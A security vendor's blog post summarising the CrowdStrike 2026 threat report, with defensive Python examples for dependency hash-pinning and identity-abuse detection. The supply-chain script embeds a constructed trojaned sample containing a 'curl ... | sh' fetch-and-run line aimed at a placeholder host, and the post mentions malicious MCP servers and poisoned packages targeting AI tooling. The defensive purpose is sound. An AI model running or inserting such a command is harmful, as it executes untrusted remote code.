The Year of the Evasive Adversary: Key Takeaways from the CrowdStrike 2026 Global Threat Report
As the cyber threat landscape grows in both complexity and speed, staying informed is critical for security teams and business leaders alike. At Echelon, we closely follow CrowdStrike's annual Global Threat Report, one of the most authoritative sources of data-driven threat intelligence, informed by CrowdStrike's Intelligence and Falcon OverWatch teams monitoring adversary activity across millions of endpoints worldwide.
As a CrowdStrike strategic partner, Echelon leverages the Falcon platform to deliver tech-enabled managed security services and integrates CrowdStrike’s intelligence into our operations to help clients stay ahead of breaches. Each year, this report provides actionable insight into where adversaries are focusing their efforts and what defenders must prioritize to respond effectively.
This year's report is titled "Year of the Evasive Adversary" for a reason. In 2025, attackers didn't just accelerate their operations; they refined how they evade detection.
What Changed in the 2025 Threat Landscape
Before exploring the key themes, it is critical to understand the scale of activity CrowdStrike observed in 2025. The following headline statistics illustrate the magnitude of the challenge:
- 89% increase in attacks by AI-enabled adversaries year-over-year
- Average eCrime breakout time (the time from initial access to lateral movement) dropped to just 29 minutes, a 65% speed increase from 2024, with the fastest observed breakout clocking in at only 27 seconds
- 82% of detections were malware-free, up from 51% in 2020, meaning attackers are increasingly operating through legitimate tools and credentials rather than traditional malware
- 37% rise in cloud-conscious intrusions, with a staggering 266% increase among named state-nexus threat actors
- 42% increase in zero-day vulnerabilities exploited before public disclosure
- China-nexus activity increased 38% across all sectors, with an 85% surge in attacks targeting logistics
- 24 new adversaries named in 2025, bringing the total tracked by CrowdStrike to 281
These figures are not just alarming in isolation; they reflect a broader shift in adversary tradecraft. Attackers are operating faster, leveraging trusted channels, and increasingly augmenting their capabilities with AI.
Key Adversary Themes from 2025
Adversaries Are Leveraging AI to Enhance and Accelerate Attacks
Artificial intelligence is no longer just a defensive tool; adversaries are actively weaponizing AI to increase attack scale, speed, and effectiveness, and the data supports it.
CrowdStrike observed an 89% year-over-year increase in attacks by AI-enabled adversaries, with threat actors using AI to accelerate phishing, generate malware, produce post-exploitation scripts, and fabricate convincing fake personas for social engineering.
Attackers are increasingly targeting AI systems directly by exploiting vulnerabilities in development platforms, deploying malicious MCP servers that impersonate legitimate services, and introducing poisoned packages designed to hijack AI tooling and extract credentials. As organizations adopt AI, these platforms and their integrations must be treated as part of the enterprise attack surface.
Ransomware Adversaries Are Expanding Cross-Domain Tradecraft
Big Game Hunting (BGH) ransomware groups remained the dominant eCrime threat in 2025, but their tactics have shifted away from traditional endpoint-based attacks.
Sophisticated threat groups such as SCATTERED SPIDER, BLOCKADE SPIDER, and PUNK SPIDER are deliberately operating in areas with limited or no EDR coverage, including unmanaged VMs, VMware ESXi infrastructure, SaaS applications, and cloud environments, enabling data encryption and exfiltration without interacting with managed endpoints.
PUNK SPIDER alone conducted 198 intrusions in 2025, a 134% year-over-year increase. The core lesson is clear: fragmented visibility across tools and teams creates exactly the conditions these adversaries look for and exploit.
China-Nexus Threat Actors Are Targeting Network Perimeter Devices
China-linked adversaries increased activity by 38% in 2025, with a clear preference for internet-facing perimeter devices like VPNs, firewalls, and gateways—systems where patching is often inconsistent.
Exploitation timelines are measured in days, not weeks, with actors weaponizing new vulnerabilities within 2 to 6 days of disclosure and maintaining access for up to 22 months in some cases.
Logistics (up 85%), telecommunications (up 30%), and financial services (up 20%) were the most targeted sectors, and CrowdStrike expects this edge-focused strategy to continue into 2026.
Supply Chain Attacks Are Enabling Evasion of Traditional Security Controls
Rather than targeting organizations directly, adversaries in 2025 increasingly compromised upstream software providers, development ecosystems, and trusted code repositories.
A notable example is North Korea-linked PRESSURE CHOLLIMA, which executed the largest cryptocurrency theft in history, stealing $1.46 billion by compromising a developer workstation, pivoting into a wallet platform’s cloud environment, and covertly redirecting transactions to an attacker-controlled wallet, all through trusted software paths.
These attacks weaponize trust in legitimate software, letting malicious activity run under the guise of authenticity. Without robust code signing, dependency validation, and third-party risk controls, that activity evades detection.
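One concrete form of the dependency validation the report calls for is hash pinning: the build records a digest of each artifact at pin time and later refuses to install anything whose bytes do not match. The script below is an added example written for this post, not CrowdStrike's or Echelon's code and not a real package manager. It parses requirement lines in the same `--hash=sha256:...` shape pip uses, then checks downloaded bytes against the pins; the lockfile, the package bytes, and the "trojaned" variant are constructed stand-ins, and the `example-wheel` name is made up.

```python
"""Verify downloaded artifacts against hashes pinned in a lockfile.

Added example, not CrowdStrike's or Echelon's code. Models the
"dependency validation" control: install only what matches a digest
recorded at pin time. Lockfile lines mirror pip's `--hash=` syntax;
the package bytes below are constructed stand-ins, not real wheels.
"""
import hashlib
import re
from dataclasses import dataclass, field

PIN_RE = re.compile(r"^(?P<name>[A-Za-z0-9_.\-]+)==(?P<version>[^\s\\]+)")
HASH_RE = re.compile(r"--hash=(?P<algo>sha256|sha512):(?P<digest>[0-9a-fA-F]+)")


@dataclass
class Pin:
    name: str
    version: str
    hashes: dict = field(default_factory=dict)  # algo -> set of hex digests


def parse_lockfile(text: str) -> dict:
    """Parse hash-pinned requirement lines (with `\\` continuations) into Pins keyed by name.

    Anything that is not an exact `name==version` with at least one --hash is
    rejected: a range spec or a bare name is exactly the gap a poisoned
    upstream release slips through.
    """
    pins = {}
    logical = re.sub(r"\\\s*\n\s*", " ", text)  # join backslash-continued lines
    for line in logical.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = PIN_RE.match(line)
        if not m:
            raise ValueError(f"unpinned or malformed requirement: {line!r}")
        pin = Pin(m["name"].lower(), m["version"])
        for h in HASH_RE.finditer(line):
            pin.hashes.setdefault(h["algo"], set()).add(h["digest"].lower())
        if not pin.hashes:
            raise ValueError(f"{pin.name}=={pin.version} has no --hash pin")
        pins[pin.name] = pin
    return pins


def verify_artifact(pin: Pin, data: bytes) -> tuple:
    """Return (ok, reason). Any one pinned digest matching is enough (one per file type)."""
    for algo, digests in pin.hashes.items():
        actual = hashlib.new(algo, data).hexdigest()
        if actual in digests:
            return True, f"{pin.name}=={pin.version}: {algo} match"
    return False, f"{pin.name}=={pin.version}: downloaded bytes match no pinned hash"


def check_install(lockfile_text: str, downloads: dict) -> dict:
    """Return {name: (ok, reason)} for each download; a real build would abort on any False."""
    pins = parse_lockfile(lockfile_text)
    results = {}
    for name, data in downloads.items():
        pin = pins.get(name.lower())
        if pin is None:
            # A dependency the lockfile never mentioned is a finding in itself.
            results[name] = (False, f"{name}: not in lockfile (unexpected dependency)")
            continue
        results[name] = verify_artifact(pin, data)
    return results


def pin_line(name: str, version: str, data: bytes, algo: str = "sha256") -> str:
    """Emit the requirement line a build would record at pin time."""
    return f"{name}=={version} --hash={algo}:{hashlib.new(algo, data).hexdigest()}"


# Constructed sample artifacts (stand-ins for a wheel's bytes), not real packages.
GOOD_WHEEL = b"PK\x03\x04 example-wheel-1.0.0 contents"
TROJANED_WHEEL = GOOD_WHEEL + b"\nimport os; os.system('curl http://example.invalid | sh')"
LOCKFILE = "# constructed lockfile\n" + pin_line("example-wheel", "1.0.0", GOOD_WHEEL) + "\n"

if __name__ == "__main__":
    for label, blob in (("clean", GOOD_WHEEL), ("trojaned", TROJANED_WHEEL)):
        ok, reason = check_install(LOCKFILE, {"example-wheel": blob})["example-wheel"]
        print(f"{label:9s} -> {'ALLOW' if ok else 'BLOCK'}: {reason}")
```

The important design choice is that the check fails closed in three ways: an unpinned or range-specified requirement is a parse error, a download the lockfile never listed is rejected, and a byte-level mismatch (here, one appended line) blocks the install even though the name and version still look right.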
Zero-Day Exploitation Is Rising Across All Threat Actor Types
CrowdStrike observed a 42% year-over-year increase in zero-day vulnerabilities exploited before public disclosure in 2025, continuing a multi-year upward trend.
Nation-state actors continue to prioritize zero-day vulnerabilities in edge devices and public-facing infrastructure to establish long-term persistence, while financially motivated groups target internet-facing enterprise applications to maximize data exfiltration at scale.
With exploitation timelines shrinking, aggressive patching cadences, proactive threat hunting, and cross-domain detection capabilities are critical to reducing exposure before adversaries can act.
Adversaries Are Subverting Trust in Cloud Platforms and Services
Cloud-conscious intrusions increased by 37% in 2025, with adversaries increasingly bypassing traditional compromise methods in favor of identity-centric techniques.
Adversaries are exploiting trust in cloud identity systems, SaaS integrations, and authentication flows by leveraging valid credentials, compromised identity providers, and stolen OAuth tokens to gain access without triggering traditional intrusion signals.
Valid account abuse accounted for 35% of all cloud incidents. Groups like SCATTERED SPIDER and BLOCKADE SPIDER targeted hybrid identity solutions to gain enterprise-wide privileged access, while Russia-linked COZY BEAR ran elaborate multi-channel social engineering campaigns directing victims to enter credentials on legitimate Microsoft login pages.
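Because valid-account abuse produces no malware and no exploit, the signal has to come from the identity telemetry itself. The script below is an added example written for this post (not CrowdStrike's, Echelon's, or any vendor's detection content) that runs three identity-centric checks over a constructed stream of sign-in and consent events: impossible travel between successive successful sign-ins, a successful sign-in without MFA from an ASN the user has never used, and an OAuth consent grant carrying high-risk scopes. The event field names, the users, the ASN baseline, and the 900 km/h threshold are all assumptions; the events are constructed, not real logs.

```python
"""Flag valid-account abuse in cloud identity telemetry.

Added example, not CrowdStrike's or Echelon's code. Runs three checks over a
constructed event stream shaped loosely like identity-provider sign-in and
audit logs (field names are assumptions):
  1. impossible travel between successive successful sign-ins,
  2. successful sign-in without MFA from a never-before-seen ASN,
  3. an OAuth consent grant carrying high-risk scopes.
"""
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

MAX_PLAUSIBLE_KMH = 900   # faster than a commercial flight between sign-ins
MIN_DISTANCE_KM = 50      # ignore geolocation jitter inside one metro area
HIGH_RISK_SCOPES = {"offline_access", "Mail.Read", "Files.ReadWrite.All",
                    "Directory.ReadWrite.All"}

# Constructed events, not real telemetry. Timestamps are UTC ISO-8601.
EVENTS = [
    {"ts": "2025-09-01T08:00:00", "type": "signin", "user": "a.lee", "ok": True,
     "mfa": True, "asn": 7018, "lat": 40.71, "lon": -74.01},     # New York, office
    {"ts": "2025-09-01T08:20:00", "type": "signin", "user": "a.lee", "ok": True,
     "mfa": False, "asn": 24940, "lat": 52.52, "lon": 13.40},    # Berlin VPS, 20 min later
    {"ts": "2025-09-01T08:25:00", "type": "consent", "user": "a.lee",
     "app": "Mailbox Sync Helper", "scopes": ["offline_access", "Mail.Read"]},
    {"ts": "2025-09-01T09:00:00", "type": "signin", "user": "b.kim", "ok": True,
     "mfa": True, "asn": 7018, "lat": 40.71, "lon": -74.01},
    {"ts": "2025-09-01T17:00:00", "type": "signin", "user": "b.kim", "ok": True,
     "mfa": True, "asn": 7018, "lat": 40.71, "lon": -74.01},
]
# Constructed 30-day baseline: ASNs each user has previously signed in from.
KNOWN_ASNS = {"a.lee": {7018}, "b.kim": {7018}}


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two lat/lon points."""
    r = 6371.0
    p1, p2 = radians(lat1), radians(lat2)
    dphi = radians(lat2 - lat1)
    dlam = radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlam / 2) ** 2
    return 2 * r * asin(sqrt(a))


def detect(events, known_asns):
    """Return a list of (rule, user, detail) findings over the event stream."""
    findings = []
    last_ok = {}  # user -> most recent successful sign-in
    for ev in sorted(events, key=lambda e: e["ts"]):  # ISO strings sort chronologically
        ts = datetime.fromisoformat(ev["ts"])
        if ev["type"] == "signin" and ev["ok"]:
            prev = last_ok.get(ev["user"])
            if prev is not None:
                km = haversine_km(prev["lat"], prev["lon"], ev["lat"], ev["lon"])
                hours = (ts - datetime.fromisoformat(prev["ts"])).total_seconds() / 3600
                # Two sign-ins at the same instant from far apart are also impossible.
                speed = km / hours if hours > 0 else float("inf")
                if km > MIN_DISTANCE_KM and speed > MAX_PLAUSIBLE_KMH:
                    findings.append(("impossible_travel", ev["user"],
                                     f"{km:.0f} km in {hours * 60:.0f} min"))
            if not ev["mfa"] and ev["asn"] not in known_asns.get(ev["user"], set()):
                findings.append(("new_asn_no_mfa", ev["user"], f"ASN {ev['asn']}"))
            last_ok[ev["user"]] = ev
        elif ev["type"] == "consent":
            risky = HIGH_RISK_SCOPES & set(ev["scopes"])
            if risky:
                findings.append(("risky_oauth_consent", ev["user"],
                                 f"{ev['app']}: {sorted(risky)}"))
    return findings


if __name__ == "__main__":
    for rule, user, detail in detect(EVENTS, KNOWN_ASNS):
        print(f"[{rule}] {user}: {detail}")
```

Run on the constructed stream, `a.lee` trips all three rules in sequence (a sign-in from Berlin twenty minutes after New York, without MFA, from an ASN not in the baseline, followed by a consent grant for `offline_access` and `Mail.Read`), while `b.kim`'s two office sign-ins produce nothing. In production the baseline would come from the identity provider's own sign-in history and the consent check would also compare the application against an allowlist; the point is that none of these signals depends on a file ever touching an endpoint.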
What This Means for Organizations in 2026
The CrowdStrike 2026 report closes with seven recommendations, all of which map to the themes above. At Echelon, these recommendations align closely with the services we deliver to clients every day:
- Secure AI to reduce emerging business and operational risk. Treat AI as part of the attack surface by governing usage, monitoring interactions, enforcing access controls, and mitigating risks like prompt injection, data exfiltration, and model abuse.
- Treat identity and SaaS as primary attack surfaces. Elevate phishing-resistant MFA, least-privilege access, and SaaS activity monitoring to baseline controls in response to identity-driven, malware-free attacks.
- Eliminate cross-domain blind spots. Close security gaps with centralized telemetry and integrated XDR/SIEM to ensure visibility across cloud, identity, and unmanaged assets.
- Secure the software supply chain and developer workflows. Make code signing, dependency validation, and developer environment hardening standard to maintain software integrity and prevent tampering.
- Prioritize edge device and perimeter patching and monitoring. Patch critical vulnerabilities within 72 hours and enforce logging, monitoring, and segmentation to reduce exposure and limit lateral movement.
- Prioritize proactive threat intelligence and hunting. Use intelligence-driven hunting and behavioral analysis to detect fast-moving threats that bypass reactive controls.
- Strengthen human resilience against social engineering. Combine security awareness, tabletop exercises, and adversary simulations to defend against increasingly effective social engineering attacks.
How Echelon Can Help
The threats outlined in this report are not theoretical; they reflect what our clients encounter daily. The most common challenge is not a lack of technology but a lack of operationalization, which leaves gaps that adversaries specifically target.
How we help close those gaps:
- Turn underutilized tools into fully operational security controls
- Identify and remediate misconfigurations across identity, cloud, and endpoint environments
- Eliminate alert fatigue with tuned detections and managed response
- Operationalize CrowdStrike Falcon across EDR/XDR, SIEM, Identity, Cloud, and Spotlight
- Support deployment health checks, full implementations, and platform migrations
- Deliver ongoing managed security operations backed by certified Falcon experts
- Maximize ROI from existing security investments
As a member of CrowdStrike’s Elevate Partner Program, our engineers hold the full breadth of Falcon certifications including CCFA, CCFR, CCFH, CCSE, CCIS, and CCCS, bringing deep, platform-wide expertise to help organizations maximize the value of their investment.
To learn more about how Echelon and CrowdStrike work together, visit our CrowdStrike Strategic Partner page or explore our CrowdStrike Platform Services.
If you'd like to talk through how the 2025 threat landscape applies to your organization specifically, start the conversation with our team. And if you would like to read the full CrowdStrike 2026 Global Threat Report yourself, we encourage you to download it here.